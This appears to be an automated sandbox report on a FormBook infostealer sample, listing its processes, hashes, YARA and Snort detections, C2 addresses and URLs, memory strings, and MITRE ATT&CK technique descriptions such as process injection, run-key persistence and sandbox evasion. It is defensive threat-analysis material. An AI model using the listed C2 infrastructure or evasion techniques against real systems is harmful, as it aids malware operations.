Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.417309274.0000000001060000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.417309274.0000000001060000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.417309274.0000000001060000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.417309274.0000000001060000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.417458366.0000000001090000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.417458366.0000000001090000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.417458366.0000000001090000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.417458366.0000000001090000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Analysis Process: explorer.exePID: 3324, Parent PID: 5360

General

Target ID:	3
Start time:	10:33:10
Start date:	29/11/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff69bc80000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.383481318.000000001091F000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000000.383481318.000000001091F000.00000040.00000001.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.383481318.000000001091F000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.383481318.000000001091F000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Analysis Process: rubthqnwyfue.exePID: 5040, Parent PID: 3324

General

Target ID:	4
Start time:	10:33:15
Start date:	29/11/2022
Path:	C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe" "C:\Users\user\AppData\Local\Temp\jaxdij.exe" C:\Users\user\AppData\L
Imagebase:	0xb90000
File size:	147968 bytes
MD5 hash:	2DD6C8B13AE7D028B0047435FF0DCB8A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 12%, ReversingLabs
Reputation:	low

Analysis Process: WerFault.exePID: 2912, Parent PID: 5040

General

Target ID:	7
Start time:	10:33:19
Start date:	29/11/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 476
Imagebase:	0xe70000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: rubthqnwyfue.exePID: 6040, Parent PID: 3324

General

Target ID:	8
Start time:	10:33:24
Start date:	29/11/2022
Path:	C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe" "C:\Users\user\AppData\Local\Temp\jaxdij.exe" C:\Users\user\AppData\L
Imagebase:	0xb90000
File size:	147968 bytes
MD5 hash:	2DD6C8B13AE7D028B0047435FF0DCB8A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: WerFault.exePID: 5420, Parent PID: 6040

General

Target ID:	10
Start time:	10:33:26
Start date:	29/11/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6040 -s 444
Imagebase:	0xe70000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: rundll32.exePID: 5412, Parent PID: 3324

General

Target ID:	11
Start time:	10:33:54
Start date:	29/11/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe
Imagebase:	0x380000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.821380016.0000000000500000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.821380016.0000000000500000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.821380016.0000000000500000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.821380016.0000000000500000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.822152428.0000000004480000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.822152428.0000000004480000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.822152428.0000000004480000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.822152428.0000000004480000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.821985368.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.821985368.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.821985368.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.821985368.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Disassembly

⊘No disassembly

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49736 -> 93.179.127.27:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49736 -> 93.179.127.27:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49736 -> 93.179.127.27:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49749 -> 107.148.15.81:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49749 -> 107.148.15.81:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49749 -> 107.148.15.81:80

Source: Joe Sandbox View	ASN Name: HOSTSLIM-GLOBAL-NETWORKNL HOSTSLIM-GLOBAL-NETWORKNL
Source: Joe Sandbox View	ASN Name: PEGTECHINCUS PEGTECHINCUS

Source: rundll32.exe, 0000000B.00000002.823746464.000000000540E000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: <li><a rel="nofollow" href="https://twitter.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.3 0.3) translate(-200 -300)"><path d="m 453.82593,412.80619 c -6.3097,2.79897 -13.09189,4.68982 -20.20852,5.54049 7.26413,-4.35454 12.84406,-11.24992 15.47067,-19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2.2673,0 -4 equals www.twitter.com (Twitter)
Source: rundll32.exe, 0000000B.00000002.824795992.0000000006FA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <li><a rel="nofollow" href="https://twitter.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.3 0.3) translate(-200 -300)"><path d="m 453.82593,412.80619 c -6.3097,2.79897 -13.09189,4.68982 -20.20852,5.54049 7.26413,-4.35454 12.84406,-11.24992 15.47067,-19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2.2673,0 -4.47114,-0.22124 -6.62011,-0.63114 4.47801,13.97857 17.47214,24.15143 32.86992,24.43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8094 53.93768,15.8094 64.72024,0 100.11301,-53.61524 100.11301,-100.11387 0,-1.52554 -0.0343,-3.04251 -0.10204,-4.55261 6.87394,-4.95995 12.83891,-11.15646 17.55618,-18.21305 z" /></g></svg></a></li> equals www.twitter.com (Twitter)
Source: rundll32.exe, 0000000B.00000002.823746464.000000000540E000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.824795992.0000000006FA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.25 0.25) translate(30 50)"><path d="M182.409,262.307v-99.803h33.499l5.016-38.895h-38.515V98.777c0-11.261,3.127-18.935,19.275-18.935 l20.596-0.009V45.045c-3.562-0.474-15.788-1.533-30.012-1.533c-29.695,0-50.025,18.126-50.025,51.413v28.684h-33.585v38.895h33.585 v99.803H182.409z" /></g></svg></a></li> equals www.facebook.com (Facebook)

Source: rundll32.exe, 0000000B.00000002.823538055.0000000004F58000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://code.jquery.com/jquery-3.3.1.min.js
Source: rundll32.exe, 0000000B.00000002.823538055.0000000004F58000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://gmpg.org/xfn/11
Source: New PO-RJ-IN-003 - Knauf Queimados.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: New PO-RJ-IN-003 - Knauf Queimados.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: rundll32.exe, 0000000B.00000002.823508673.0000000004DC6000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://oonrreward.xyz/m9ae/?F6z4=LevhYPqdwsQo7WECD6x58K9v32wKr9jEH/unqFqLIkFUX6m7L7
Source: explorer.exe, 00000003.00000000.313546436.0000000000921000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.391112959.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.361885332.000000000091F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: rundll32.exe, 0000000B.00000002.823508673.0000000004DC6000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.oonrreward.xyz
Source: 456b6ELMQ.11.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 456b6ELMQ.11.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: rundll32.exe, 0000000B.00000002.824187605.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css
Source: rundll32.exe, 0000000B.00000002.824187605.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://controlpanel.easyspace.com/
Source: 456b6ELMQ.11.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: rundll32.exe, 0000000B.00000003.485044441.0000000007231000.00000004.00000800.00020000.00000000.sdmp, 456b6ELMQ.11.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 456b6ELMQ.11.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: rundll32.exe, 0000000B.00000002.823746464.000000000540E000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: rundll32.exe, 0000000B.00000002.823746464.000000000540E000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.824795992.0000000006FA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://help.hover.com/home?source=parked
Source: rundll32.exe, 0000000B.00000002.824085555.0000000005BE8000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://mchost.ru/
Source: rundll32.exe, 0000000B.00000003.485044441.0000000007231000.00000004.00000800.00020000.00000000.sdmp, 456b6ELMQ.11.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: rundll32.exe, 0000000B.00000003.485044441.0000000007231000.00000004.00000800.00020000.00000000.sdmp, 456b6ELMQ.11.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: rundll32.exe, 0000000B.00000003.485044441.0000000007231000.00000004.00000800.00020000.00000000.sdmp, 456b6ELMQ.11.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: rundll32.exe, 0000000B.00000003.485044441.0000000007231000.00000004.00000800.00020000.00000000.sdmp, 456b6ELMQ.11.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: rundll32.exe, 0000000B.00000002.824187605.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://supportservices.easyspace.com/
Source: rundll32.exe, 0000000B.00000002.823746464.000000000540E000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.824795992.0000000006FA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/hover
Source: rundll32.exe, 0000000B.00000002.824187605.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.easyspace.com/
Source: rundll32.exe, 0000000B.00000002.824187605.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.easyspace.com/assets/images/structure/easyspace-logo-main.svg
Source: rundll32.exe, 0000000B.00000003.485044441.0000000007231000.00000004.00000800.00020000.00000000.sdmp, 456b6ELMQ.11.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: rundll32.exe, 0000000B.00000002.823746464.000000000540E000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.824795992.0000000006FA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.hover.com/?source=parked
Source: rundll32.exe, 0000000B.00000002.823746464.000000000540E000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.824795992.0000000006FA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.hover.com/about?source=parked
Source: rundll32.exe, 0000000B.00000002.823746464.000000000540E000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.824795992.0000000006FA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.hover.com/domain_pricing?source=parked
Source: rundll32.exe, 0000000B.00000002.823746464.000000000540E000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/domains/results
Source: rundll32.exe, 0000000B.00000002.823746464.000000000540E000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.824795992.0000000006FA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.hover.com/email?source=parked
Source: rundll32.exe, 0000000B.00000002.823746464.000000000540E000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.824795992.0000000006FA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.hover.com/privacy?source=parked
Source: rundll32.exe, 0000000B.00000002.823746464.000000000540E000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.824795992.0000000006FA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.hover.com/renew?source=parked
Source: rundll32.exe, 0000000B.00000002.823746464.000000000540E000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.824795992.0000000006FA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.hover.com/tools?source=parked
Source: rundll32.exe, 0000000B.00000002.823746464.000000000540E000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.824795992.0000000006FA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.hover.com/tos?source=parked
Source: rundll32.exe, 0000000B.00000002.823746464.000000000540E000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.824795992.0000000006FA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.hover.com/transfer_in?source=parked
Source: rundll32.exe, 0000000B.00000002.823746464.000000000540E000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.824795992.0000000006FA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.instagram.com/hover_domains

Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	ReversingLabs: Detection: 12%
Source: C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe	ReversingLabs: Detection: 12%

Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe	Joe Sandbox ML: detected

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 09:34:33 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Sun, 02 Oct 2022 12:42:28 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4677Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 52 6d 73 d3 c8 96 fe 0c bf e2 8c 73 67 80 aa d8 4a 26 61 76 b0 15 df 82 90 0c b9 05 24 9b 84 e5 4e 6d ed 52 6d e9 48 ea 49 ab 8f e8 6e d9 d6 4d cd fe f6 3d dd 92 5f 63 b8 70 77 0d b1 a5 7e 79 ce f3 16 ff f0 fa f2 f4 f6 f7 ab 33 28 5c a9 e0 ea c3 ab b7 17 a7 d0 eb 47 d1 c7 a3 d3 28 7a 7d fb 1a fe fe e6 f6 dd 5b 38 1c 1c c0 8d 33 32 71 51 74 f6 be 07 bd c2 b9 6a 18 45 b3 d9 6c 30 3b 1a 90 c9 a3 db eb 68 ee 51 0e fd b5 ee b1 6f c3 9d 41 ea d2 de f8 71 1c 86 cc 4b a5 ed c9 0e 80 c3 17 2f 5e b4 f7 7a fe d0 50 09 9d 9f f4 50 f7 60 f9 e4 31 50 a4 50 19 ca a4 c2 25 4a 5e 56 79 c0 98 67 3a 3a 3c e4 73 d0 7d e2 12 9d 00 7f ac 8f 9f 6b 39 3d e9 9d 92 76 a8 5d ff b6 a9 b0 07 49 fb 76 d2 73 38 77 91 1f 3e 82 a4 10 c6 a2 3b a9 5d d6 ff b5 07 d1 1a 9a 93 4e e1 f8 f8 e0 18 fa 70 f5 f2 b7 33 78 7f 79 0b e7 97 1f de bf 8e a3 76 ef f1 e3 47 fc 89 7f e8 f7 e1 65 9a c2 8d 92 29 c2 65 ed 2c f4 fb e3 76 cf 26 46 56 0e ac 49 96 02 12 4a 71 f0 c7 e7 1a 4d 33 48 a8 8c da c7 fe d1 e0 68 70 38 28 a5 1e fc 61 7b e3 38 6a 6f 8e 17 74 1e c2 45 49 2e fb b6 b1 d1 1f 36 b2 b2 ac 14 f6 71 5e 09 9d 3e 04 59 8a 5a a9 b3 ae 51 08 8e 8d e9 fc 48 ac 5d f3 72 42 69 73 5f 89 34 95 3a 1f 1e 8c 4a 61 72 a9 f9 21 63 0f fb 99 28 a5 6a 86 05 aa 29 3a 99 88 d1 9f cb 7b 7b de 64 21 35 9a fb ee ce cf 07 d5 1c 44 ed 68 34 93 a9 2b 86 bf fe f2 6b 35 df 79 03 f6 1c 55 ec f7 fd 44 24 77 b9 a1 5a a7 7d 59 8a 1c 87 b5 51 4f 9f 2c f5 86 35 1b f1 49 3e ff 69 36 f8 a3 ca 9f 3c 1b ad 5d 32 58 a1 70 43 4d dd d3 c6 e4 02 65 5e b8 e1 e1 57 68 94 32 fd 2e 1a 7c 7e 90 cb 6c 27 89 f6 a7 df 7c 83 fa 76 2c ec e5 c2 91 99 90 73 54 de 57 64 a5 93 a4 19 47 09 27 a7 38 52 98 b9 e1 d1 0b 46 c9 14 f1 00 ff fe 4f 00 e7 f3 f9 fd da e1 45 ac c7 3e 99 a3 17 ff c6 df 87 fc 38 82 2e b1 90 56 fb d5 3f 5c a4 f7 f5 09 7e 09 b5 5b 9f e2 4b d5 17 4a e6 7a 98 f0 16 9a ef 70 a0 83 83 3d 34 86 4c 42 29 de 87 e2 59 f9 0f 1c 1e 79 ae e1 75 d6 46 f9 eb c1 c1 b7 e2 4d 84 de ae e6 01 ff fb d6 eb 05 59 87 e9 a4 b9 df 1e bf 62 f7 f3 f3 05 3b eb 1a 85 43 e9 d8 83 64 b4 35 f1 5b 07 26 54 57 a4 ef 13 52 64 86 7b 2f 5f 1d 1c 6c 0e fb 79 e7 b0 6f 04 cf d1 59 27 0c 2b 02 f1 c5 11 47 87 3b 47 fc 8b fe af 8d 5c 84 e0 fd 3f 7a fe c5 4a 4c c8 39 2a 19 e5 7e 22 92 bb dc 50 ad d3 be 2c 45 8e c3 da a8 a7 4f a2 24 97 7d db d8 28 ac d9 88 4f b6 57 06 b9 cc 9e 3c 1b ad dd 32 58 21 b7 53 53 f7 b4 51 c8 a2 d5 72 78 fc ed e5 cc c4 e7 4f ab fd 85 1e 78 1e 22 0e df 23 a8 44 9a 4a 9d 0f e1 b0 4d be fd 19 41 a2 50 98 21 33 2d be 75 9a 48 12 32 a9 e4 36 ac c2 81 17 07 3f 8e a0 95 01 bf 3c 67 ec 11 94 52 f7 3b 31 3c ad 5d ea 98 1d 80 a8 1d 8d c0 e1 dc f5 39 c6 9c d7 12 06 47 f3 dd 24 a0 56 70 bf 8e a3 30 73 df 8f 42 bb 51 1e 3d fa 66 04 25 61
